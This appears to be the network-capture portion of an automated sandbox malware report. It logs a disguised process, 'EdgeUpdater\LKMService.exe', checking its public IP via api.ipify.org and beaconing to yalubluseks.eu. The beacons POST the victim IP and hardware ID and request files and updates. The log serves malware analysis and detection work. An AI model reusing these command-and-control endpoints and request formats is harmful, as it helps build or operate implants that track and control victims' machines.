                Date: Thu, 03 Oct 2024 01:29:23 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc9293199fe43f9-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination Port
                18192.168.2.652964104.26.12.20580
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:29:55.327461004 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:29:55.790553093 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:29:55 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc929fb5c0a42c8-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination Port
                19192.168.2.652966104.26.12.20580
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:29:56.777282000 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org


                Session IDSource IPSource PortDestination IPDestination Port
                20192.168.2.652967104.26.12.20580
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:29:58.208437920 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:29:58.682671070 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:29:58 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc92a0d6a2043d4-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination Port
                21192.168.2.652969104.26.12.20580
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:29:59.687283039 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:30:00.179977894 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:00 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc92a16bdab5e6c-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination Port
                22192.168.2.652972104.26.12.20580
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:30:08.349116087 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:30:09.501427889 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:08 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc92a4cc8a6b9c5-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33
                Oct 3, 2024 03:30:09.501519918 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:08 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc92a4cc8a6b9c5-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33
                Oct 3, 2024 03:30:09.501576900 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:08 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc92a4cc8a6b9c5-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination Port
                23192.168.2.652974104.26.12.20580
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:30:10.553853989 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:30:11.029313087 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:10 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc92a5a9ff30f80-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33
                Oct 3, 2024 03:30:19.985565901 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:30:20.111726046 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:20 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc92a934de50f80-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33
                Oct 3, 2024 03:30:21.089272022 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:30:21.199723005 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:21 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc92a9a2ea20f80-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33
                Oct 3, 2024 03:30:53.153734922 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:30:53.273907900 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:53 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc92b6299940f80-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.649716104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:26:14 UTC167OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                Connection: Keep-Alive
                2024-10-03 01:26:14 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:26:14 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30
                Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
                2024-10-03 01:26:14 UTC619INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:26:14 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BX3%2BFkBwC%2Fj50OrOK17NOf7AFcBGABAb%2BvnwVu7p%2Bs%2B04B%2BuzJ3sZApOfOqjuUVGfsRpbiOvlqhi0EP1AgQIZaa5tPlLicejtZCiax%2Bq6NYORw%2FjM9nX%2F45UEdselEU6RA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc924944a434299-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.649717104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:26:15 UTC144OUTPOST /get_file.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:26:15 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:26:15 UTC84OUTData Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
                2024-10-03 01:26:16 UTC609INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:26:15 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=olIPn4nJJTyrmsepFhbuyBS5d2GSWrp2xGfDHK%2FzTX63WAmjW2n520rHeRwz44kONhjCC%2FGT0H1%2BJEqlonhPa9NoM6acr5yNB15N3rU5EHZ%2FiZ4kPu6cVSPfdjkEoGyzrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc9249bfd1c8ca7-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.649718104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:26:16 UTC146OUTPOST /get_update.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 19
                Expect: 100-continue
                2024-10-03 01:26:16 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:26:16 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                Data Ascii: current_version=0.3
                2024-10-03 01:26:16 UTC609INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:26:16 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i2OJdXRcxdtRs4L4TyQFT7g0NbRvPWpKfX4WQFpTubSPvIK2Qsi5OfNjU2V8ap4Qv6GcomcG1BX8YFweSfUriMPFCe2dKQc1%2Fbr25dxS6QGsByvPND%2By4XZ%2BIpu%2BJrPLZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc924a1788a1801-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.649729104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:26:47 UTC143OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:26:47 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:26:47 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30
                Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
                2024-10-03 01:26:48 UTC611INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:26:48 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=toEjJ08xYBu0KSdBp7gCYep1n4toTy3%2Bz7XS%2F1d%2FGS%2FKzL9Wbt0aOrzZErEOuk4HmJsLs2M03DYyt718P5PyvcC%2FUasZn4tFUAoojabhTzI8L6z5dxJhVPVoN5phg4RBsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc9256418cd8c57-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.649730104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:26:48 UTC144OUTPOST /get_file.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:26:48 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:26:48 UTC84OUTData Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
                2024-10-03 01:26:49 UTC605INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:26:49 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gE6jVjnevpB%2BWAjHaQ37ikIsPi7wwFy8lDZN1AmAqgsAP0w5vyTJbxIQpKgRyqg6k%2FgPt91aOFeGv10x98PekVsvewXndYRbTBZe7KxLzEV8YoDsduizYXsKzQlxSI9AhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc9256adad3c443-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.649731104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:26:49 UTC146OUTPOST /get_update.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 19
                Expect: 100-continue
                2024-10-03 01:26:49 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:26:49 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                Data Ascii: current_version=0.3
                2024-10-03 01:26:50 UTC613INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:26:49 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w2WMGWyP2cS%2BJF9%2BW988celZmnbCOKTLsS1xrHCD%2FV4czdxW4RWAp5uMmJdaI%2FQToPJJc%2BE2Vv8vcrIemiFoqZkrauwsbQtan5JsXFQQbWC%2BuLKGW7uoqEAOiFLR0aaMPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc92570fa5f7ca0-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.652919104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:27:21 UTC143OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:27:21 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:27:21 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30
                Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
                2024-10-03 01:27:21 UTC613INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:27:21 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9mCZsospj8nqUEQDpNhhro0r9G13kzxUAgHN0XwC8kB3tP70Mu6RQmA4M3%2BWf9c%2FWaJdebiV1cgS4bOJztYFnNoDfpag%2FXHdcnB4XR2%2BAn8mWnZGRm%2FFm7VIT2hY7%2B10jA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc926360df9c335-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                7192.168.2.652920104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:27:22 UTC144OUTPOST /get_file.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:27:22 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:27:22 UTC84OUTData Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
                2024-10-03 01:27:23 UTC637INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:27:23 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xkm1sIa%2BEVfABN8FYzM4vy04%2FGfnyZ6uJGBqjteyYV8ybQSgGNV7xYrzoT0DT8pqBZ5xkfJoPiz7bbADIZGFX0BdI4QcKnl%2BWT1C4TSzWeohF9ySvyTHRdIZXtb6cD4B3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc9263ece8c0f3f-EWR
                alt-svc: h3=":443"; ma=86400
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.652921104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:27:23 UTC146OUTPOST /get_update.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 19
                Expect: 100-continue
                2024-10-03 01:27:23 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:27:23 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                Data Ascii: current_version=0.3
                2024-10-03 01:27:24 UTC607INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:27:24 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XwC97xdakPc4IiIpC7n8%2BNdwHIS1XGPJgdIdW0oRsuAqynF5ooGSVzWvErK%2FpFbS7C1dl%2FwrVIo5VZzyWfjxm8hReN2IlK3v807bcCLFp7qLLXCvGkphu2WtW6Q90I8PqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc926464cad5e7d-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                9192.168.2.652924104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:27:55 UTC143OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:27:55 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:27:55 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30
                Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
                2024-10-03 01:27:55 UTC605INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:27:55 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qMRzAeRwPOz8yH08PLIzq0V42x94KOWCGCLd%2F7jde1nm4JC%2FT59kRveHlwCr2ruE88lzuQYJ5q8Mc2Fr5AwMy0U3e13b8WmardUmylg9Ng2diuFz2tvwPlvnPqM3CssHnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc9270a58da32d9-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                10192.168.2.652927104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:02 UTC143OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:28:02 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:02 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30
                Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
                2024-10-03 01:28:02 UTC611INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:02 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wVmBeXTf56APsVg5THpBKsPrru9IEMZGJt3NGVfNaJBBAES8M2zM3%2FKCXqchFqbQD3nbLQyi19hrDQ%2Ba8daVqb4Ajnj1T%2B%2FbM4D3cnXIuXqXkyqu88OzV3OTnSt%2FJy0wrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc92737ab0a8c77-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                11192.168.2.652929104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:03 UTC144OUTPOST /get_file.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:28:03 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:03 UTC84OUTData Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
                2024-10-03 01:28:04 UTC611INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:04 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MiBdeT2v6PnUWeU233v4RhBYvebMFnIXonc3k80gNy%2FDgS0EuWNpvRg6QI%2FyMLCyyTj0p%2Br4NjYg1PrMOfC9DQ50GzbWnS%2BV7P0vOyupjyG2vvLiIxMFj%2F6YK2qMm0dNCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc927408f650c7a-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                12192.168.2.652930104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:04 UTC146OUTPOST /get_update.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 19
                Expect: 100-continue
                2024-10-03 01:28:04 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:04 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                Data Ascii: current_version=0.3


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                13192.168.2.652933104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:25 UTC143OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:28:25 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:25 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30
                Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
                2024-10-03 01:28:25 UTC611INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:25 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=quoPapH3J6HNh0mqWtFgOcevIv4m6AGVXa2ShPRyZE1tyVpdO3cBqJj4KFwvNFDUpkuHLKdHjJ%2Fz09qstMfsoJiCuC7iSMOV%2BEIPb%2BOsH4Z%2Fa%2BScb666zIlG5NAnNMLtmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc927c76c184261-EWR
